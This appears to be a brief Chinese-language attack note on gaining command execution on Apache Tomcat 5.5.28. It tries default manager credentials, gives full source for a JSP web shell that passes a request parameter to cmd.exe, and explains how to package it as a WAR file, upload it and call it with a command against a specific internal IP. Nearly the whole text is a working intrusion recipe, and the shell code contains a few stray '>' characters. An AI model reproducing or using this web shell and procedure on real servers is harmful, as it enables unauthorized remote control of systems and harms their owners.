Tomcat 5.5.28 war文件上传漏洞
1、tomcat端口一般是8080
2、尝试弱口令登录tomcat
tomcat tomcat
admin 空口令
3、新建shell.jsp内容如下<%@ page import="java.util.*,java.io.*,java.net.*"%> <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "\n<BR>"); Process p = Runtime.getRuntime().exec("cmd.exe /c " + >request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine();> while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %>4、将shell.jsp压缩为shell.zip,重命名为shell.war
5、tomcat后台点击List >Applications,Select file to Upupload,上传
6、访问http://10.6.6.213:8080/shell/shell.jsp?cmd=whoami
